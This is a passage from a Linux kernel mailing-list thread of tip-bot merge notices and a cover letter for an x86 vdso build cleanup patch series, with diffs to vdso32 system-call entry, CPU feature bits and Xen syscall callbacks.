- mov %eax, (SGX_ENCLAVE_RUN_LEAF)(%rbx)
- mov %di, (SGX_ENCLAVE_RUN_EXCEPTION_VECTOR)(%rbx)
- mov %si, (SGX_ENCLAVE_RUN_EXCEPTION_ERROR_CODE)(%rbx)
- mov %rdx, (SGX_ENCLAVE_RUN_EXCEPTION_ADDR)(%rbx)
- jmp .Lhandle_exit
-
-.Linvoke_userspace_handler:
- /* Pass the untrusted RSP (at exit) to the callback via %rcx. */
- mov %rsp, %rcx
-
- /* Save struct sgx_enclave_exception %rbx is about to be clobbered. */
- mov %rbx, %rax
-
- /* Save the untrusted RSP offset in %rbx (non-volatile register). */
- mov %rsp, %rbx
- and $0xf, %rbx
-
- /*
- * Align stack per x86_64 ABI. Note, %rsp needs to be 16-byte aligned
- * _after_ pushing the parameters on the stack, hence the bonus push.
- */
- and $-0x10, %rsp
- push %rax
-
- /* Push struct sgx_enclave_exception as a param to the callback. */
- push %rax
-
- /* Clear RFLAGS.DF per x86_64 ABI */
- cld
-
- /*
- * Load the callback pointer to %rax and lfence for LVI (load value
- * injection) protection before making the call.
- */
- mov SGX_ENCLAVE_RUN_USER_HANDLER(%rax), %rax
- lfence
- call *%rax
-
- /* Undo the post-exit %rsp adjustment. */
- lea 0x10(%rsp, %rbx), %rsp
-
- /*
- * If the return from callback is zero or negative, return immediately,
- * else re-execute ENCLU with the positive return value interpreted as
- * the requested ENCLU function.
- */
- cmp $0, %eax
- jle .Lout
- jmp .Lenter_enclave
-
- .cfi_endproc
-
-_ASM_VDSO_EXTABLE_HANDLE(.Lenclu_eenter_eresume, .Lhandle_exception)
-
-SYM_FUNC_END(__vdso_sgx_enter_enclave)
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:01:23 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 36d83c249e0395a915144eceeb528ddc19b1fbe6
Gitweb: https://git.kernel.org/tip/36d83c249e0395a915144eceeb528ddc19b1fbe6
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:04 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: When using int $0x80, use it directly
When neither sysenter32 nor syscall32 is available (on either
FRED-capable 64-bit hardware or old 32-bit hardware), there is no
reason to do a bunch of stack shuffling in __kernel_vsyscall.
Unfortunately, just overwriting the initial "push" instructions will
mess up the CFI annotations, so suffer the 3-byte NOP if not
applicable.
Similarly, inline the int $0x80 when doing inline system calls in the
vdso instead of calling __kernel_vsyscall.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-11-hpa@zytor.com
---
arch/x86/entry/vdso/vdso32/system_call.S | 18 ++++++++++++++----
arch/x86/include/asm/vdso/sys_call.h | 4 +++-
2 files changed, 17 insertions(+), 5 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 7b1c0f1..9157cf9 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -14,6 +14,18 @@
ALIGN
__kernel_vsyscall:
CFI_STARTPROC
+
+ /*
+ * If using int $0x80, there is no reason to muck about with the
+ * stack here. Unfortunately just overwriting the push instructions
+ * would mess up the CFI annotations, but it is only a 3-byte
+ * NOP in that case. This could be avoided by patching the
+ * vdso symbol table (not the code) and entry point, but that
+ * would require a fair bit of tooling work, or by compiling
+ * two different vDSO images; neither seems worth it.
+ */
+ ALTERNATIVE "int $0x80; ret", "", X86_FEATURE_SYSFAST32
+
/*
* Reshuffle regs so that all of any of the entry instructions
* will preserve enough state.
@@ -52,11 +64,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
- /* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
+ ALTERNATIVE SYSENTER_SEQUENCE, SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
- /* Enter using int $0x80 */
+ /* Re-enter using int $0x80 */
int $0x80
SYM_INNER_LABEL(int80_landing_pad, SYM_L_GLOBAL)
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
index dcfd17c..5806b1c 100644
--- a/arch/x86/include/asm/vdso/sys_call.h
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -20,7 +20,9 @@
# define __sys_reg4 "r10"
# define __sys_reg5 "r8"
#else
-# define __sys_instr "call __kernel_vsyscall"
+# define __sys_instr ALTERNATIVE("ds;ds;ds;int $0x80", \
+ "call __kernel_vsyscall", \
+ X86_FEATURE_SYSFAST32)
# define __sys_clobber "memory"
# define __sys_nr(x,y) __NR_ ## x ## y
# define __sys_reg1 "ebx"
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:45 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: f49ecf5e110ab0ed255ddea5e321689faf4e50e6
Gitweb: https://git.kernel.org/tip/f49ecf5e110ab0ed255ddea5e321689faf4e50e6
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:03 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/cpufeature: Replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
In most cases, the use of "fast 32-bit system call" depends either on
X86_FEATURE_SEP or X86_FEATURE_SYSENTER32 || X86_FEATURE_SYSCALL32.
However, nearly all the logic for both is identical.
Define X86_FEATURE_SYSFAST32 which indicates that *either* SYSENTER32 or
SYSCALL32 should be used, for either 32- or 64-bit kernels. This
defaults to SYSENTER; use SYSCALL if the SYSCALL32 bit is also set.
As this removes ALL existing uses of X86_FEATURE_SYSENTER32, which is
a kernel-only synthetic feature bit, drop it entirely and reuse its
slot for X86_FEATURE_SYSFAST32.
This leaves an unused alternative for a true 32-bit kernel, but that
should really not matter in any way.
The clearing of X86_FEATURE_SYSCALL32 can be removed once the patches
for automatically clearing disabled features have been merged.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-10-hpa@zytor.com
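The selection policy described above can be modeled as a small decision function. This is an illustrative sketch only: the names (`pick_fast32`, the `enum fast32` values) are hypothetical and not the kernel's actual API; the real kernel implements this via the ALTERNATIVE_2 patching shown in the diff below.

```c
#include <stdbool.h>

/*
 * Illustrative model of the fast-32-bit-syscall policy:
 * SYSFAST32 set means a fast mechanism is available; if SYSCALL32
 * is also set, SYSCALL is preferred over SYSENTER. Without
 * SYSFAST32, fall back to int $0x80. (In practice SYSCALL32 is
 * never set without SYSFAST32, since get_cpu_cap() sets SYSFAST32
 * unconditionally on 64-bit kernels.)
 */
enum fast32 { FAST32_INT80, FAST32_SYSENTER, FAST32_SYSCALL };

static enum fast32 pick_fast32(bool sysfast32, bool syscall32)
{
	if (!sysfast32)
		return FAST32_INT80;
	return syscall32 ? FAST32_SYSCALL : FAST32_SYSENTER;
}
```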
---
arch/x86/Kconfig.cpufeatures | 8 +++++++-
arch/x86/entry/vdso/vdso32/system_call.S | 8 +------
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/kernel/cpu/centaur.c | 3 +--
arch/x86/kernel/cpu/common.c | 8 +++++++-
arch/x86/kernel/cpu/intel.c | 4 +---
arch/x86/kernel/cpu/zhaoxin.c | 4 +---
arch/x86/kernel/fred.c | 2 +-
arch/x86/xen/setup.c | 28 ++++++++++++++---------
arch/x86/xen/smp_pv.c | 5 +---
arch/x86/xen/xen-ops.h | 1 +-
11 files changed, 42 insertions(+), 31 deletions(-)
diff --git a/arch/x86/Kconfig.cpufeatures b/arch/x86/Kconfig.cpufeatures
index 733d5af..423ac79 100644
--- a/arch/x86/Kconfig.cpufeatures
+++ b/arch/x86/Kconfig.cpufeatures
@@ -56,6 +56,10 @@ config X86_REQUIRED_FEATURE_MOVBE
def_bool y
depends on MATOM
+config X86_REQUIRED_FEATURE_SYSFAST32
+ def_bool y
+ depends on X86_64 && !X86_FRED
+
config X86_REQUIRED_FEATURE_CPUID
def_bool y
depends on X86_64
@@ -120,6 +124,10 @@ config X86_DISABLED_FEATURE_CENTAUR_MCR
def_bool y
depends on X86_64
+config X86_DISABLED_FEATURE_SYSCALL32
+ def_bool y
+ depends on !X86_64
+
config X86_DISABLED_FEATURE_PCID
def_bool y
depends on !X86_64
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 2a15634..7b1c0f1 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,13 +52,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
-#else
- ALTERNATIVE "", SYSENTER_SEQUENCE, X86_FEATURE_SEP
-#endif
+ ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
+ SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
/* Enter using int $0x80 */
int $0x80
diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
index c3b53be..63b0f9a 100644
--- a/arch/x86/include/asm/cpufeatures.h
+++ b/arch/x86/include/asm/cpufeatures.h
@@ -84,7 +84,7 @@
#define X86_FEATURE_PEBS ( 3*32+12) /* "pebs" Precise-Event Based Sampling */
#define X86_FEATURE_BTS ( 3*32+13) /* "bts" Branch Trace Store */
#define X86_FEATURE_SYSCALL32 ( 3*32+14) /* syscall in IA32 userspace */
-#define X86_FEATURE_SYSENTER32 ( 3*32+15) /* sysenter in IA32 userspace */
+#define X86_FEATURE_SYSFAST32 ( 3*32+15) /* sysenter/syscall in IA32 userspace */
#define X86_FEATURE_REP_GOOD ( 3*32+16) /* "rep_good" REP microcode works well */
#define X86_FEATURE_AMD_LBR_V2 ( 3*32+17) /* "amd_lbr_v2" AMD Last Branch Record Extension Version 2 */
#define X86_FEATURE_CLEAR_CPU_BUF ( 3*32+18) /* Clear CPU buffers using VERW */
diff --git a/arch/x86/kernel/cpu/centaur.c b/arch/x86/kernel/cpu/centaur.c
index a3b55db..9833f83 100644
--- a/arch/x86/kernel/cpu/centaur.c
+++ b/arch/x86/kernel/cpu/centaur.c
@@ -102,9 +102,6 @@ static void early_init_centaur(struct cpuinfo_x86 *c)
(c->x86 >= 7))
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
index e7ab22f..1c3261c 100644
--- a/arch/x86/kernel/cpu/common.c
+++ b/arch/x86/kernel/cpu/common.c
@@ -1068,6 +1068,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
init_scattered_cpuid_features(c);
init_speculation_control(c);
+ if (IS_ENABLED(CONFIG_X86_64) || cpu_has(c, X86_FEATURE_SEP))
+ set_cpu_cap(c, X86_FEATURE_SYSFAST32);
+
/*
* Clear/Set all flags overridden by options, after probe.
* This needs to happen each time we re-probe, which may happen
@@ -1813,6 +1816,11 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
* that it can't be enabled in 32-bit mode.
*/
setup_clear_cpu_cap(X86_FEATURE_PCID);
+
+ /*
+ * Never use SYSCALL on a 32-bit kernel
+ */
+ setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
#endif
/*
diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
index 98ae4c3..646ff33 100644
--- a/arch/x86/kernel/cpu/intel.c
+++ b/arch/x86/kernel/cpu/intel.c
@@ -236,9 +236,7 @@ static void early_init_intel(struct cpuinfo_x86 *c)
clear_cpu_cap(c, X86_FEATURE_PSE);
}
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#else
+#ifndef CONFIG_X86_64
/* Netburst reports 64 bytes clflush size, but does IO in 128 bytes */
if (c->x86 == 15 && c->x86_cache_alignment == 64)
c->x86_cache_alignment = 128;
diff --git a/arch/x86/kernel/cpu/zhaoxin.c b/arch/x86/kernel/cpu/zhaoxin.c
index 89b1c8a..031379b 100644
--- a/arch/x86/kernel/cpu/zhaoxin.c
+++ b/arch/x86/kernel/cpu/zhaoxin.c
@@ -59,9 +59,7 @@ static void early_init_zhaoxin(struct cpuinfo_x86 *c)
{
if (c->x86 >= 0x6)
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
+
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/fred.c b/arch/x86/kernel/fred.c
index 816187d..e736b19 100644
--- a/arch/x86/kernel/fred.c
+++ b/arch/x86/kernel/fred.c
@@ -68,7 +68,7 @@ void cpu_init_fred_exceptions(void)
idt_invalidate();
/* Use int $0x80 for 32-bit system calls in FRED mode */
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
}
diff --git a/arch/x86/xen/setup.c b/arch/x86/xen/setup.c
index 3823e52..ac8021c 100644
--- a/arch/x86/xen/setup.c
+++ b/arch/x86/xen/setup.c
@@ -990,13 +990,6 @@ static int register_callback(unsigned type, const void *func)
return HYPERVISOR_callback_op(CALLBACKOP_register, &callback);
}
-void xen_enable_sysenter(void)
-{
- if (cpu_feature_enabled(X86_FEATURE_SYSENTER32) &&
- register_callback(CALLBACKTYPE_sysenter, xen_entry_SYSENTER_compat))
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
-}
-
void xen_enable_syscall(void)
{
int ret;
@@ -1008,11 +1001,27 @@ void xen_enable_syscall(void)
mechanism for syscalls. */
}
- if (cpu_feature_enabled(X86_FEATURE_SYSCALL32) &&
- register_callback(CALLBACKTYPE_syscall32, xen_entry_SYSCALL_compat))
+ if (!cpu_feature_enabled(X86_FEATURE_SYSFAST32))
+ return;
+
+ if (cpu_feature_enabled(X86_FEATURE_SYSCALL32)) {
+ /* Use SYSCALL32 */
+ ret = register_callback(CALLBACKTYPE_syscall32,
+ xen_entry_SYSCALL_compat);
+
+ } else {
+ /* Use SYSENTER32 */
+ ret = register_callback(CALLBACKTYPE_sysenter,
+ xen_entry_SYSENTER_compat);
+ }
+
+ if (ret) {
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
+ }
}
+
static void __init xen_pvmmu_arch_setup(void)
{
HYPERVISOR_vm_assist(VMASST_CMD_enable, VMASST_TYPE_writable_pagetables);
@@ -1022,7 +1031,6 @@ static void __init xen_pvmmu_arch_setup(void)
register_callback(CALLBACKTYPE_failsafe, xen_failsafe_callback))
BUG();
- xen_enable_sysenter();
xen_enable_syscall();
}
diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
index 9bb8ff8..c40f326 100644
--- a/arch/x86/xen/smp_pv.c
+++ b/arch/x86/xen/smp_pv.c
@@ -65,10 +65,9 @@ static void cpu_bringup(void)
touch_softlockup_watchdog();
/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
- if (!xen_feature(XENFEAT_supervisor_mode_kernel)) {
- xen_enable_sysenter();
+ if (!xen_feature(XENFEAT_supervisor_mode_kernel))
xen_enable_syscall();
- }
+
cpu = smp_processor_id();
identify_secondary_cpu(cpu);
set_cpu_sibling_map(cpu);
diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
index 090349b..f6c331b 100644
--- a/arch/x86/xen/xen-ops.h
+++ b/arch/x86/xen/xen-ops.h
@@ -60,7 +60,6 @@ phys_addr_t __init xen_find_free_area(phys_addr_t size);
char * __init xen_memory_setup(void);
void __init xen_arch_setup(void);
void xen_banner(void);
-void xen_enable_sysenter(void);
void xen_enable_syscall(void);
void xen_vcpu_restore(void);
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:49 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 98d3e996513ad00b7824ea3bece506fc645547dd
Gitweb: https://git.kernel.org/tip/98d3e996513ad00b7824ea3bece506fc645547dd
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:59 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: Remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
A macro SYSCALL_ENTER_KERNEL was defined in sigreturn.S, with the
ability to override it. The override capability, however, is not
used anywhere, and the macro name is potentially confusing because it
seems to imply that sysenter/syscall could be used here, which is NOT
true: the sigreturn system calls MUST use int $0x80.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-6-hpa@zytor.com
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 8 ++------
1 file changed, 2 insertions(+), 6 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 1bd068f..965900c 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -3,10 +3,6 @@
#include <asm/unistd_32.h>
#include <asm/asm-offsets.h>
-#ifndef SYSCALL_ENTER_KERNEL
-#define SYSCALL_ENTER_KERNEL int $0x80
-#endif
-
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
@@ -16,7 +12,7 @@ __kernel_sigreturn:
.LSTART_sigreturn:
popl %eax /* XXX does this mean it needs unwind info? */
movl $__NR_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
@@ -28,7 +24,7 @@ SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
__kernel_rt_sigreturn:
.LSTART_rt_sigreturn:
movl $__NR_rt_sigreturn, %eax
- SYSCALL_ENTER_KERNEL
+ int $0x80
.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
nop
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:54 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 8717b02b8c030dc0c4b55781b59e88def0a1a92f
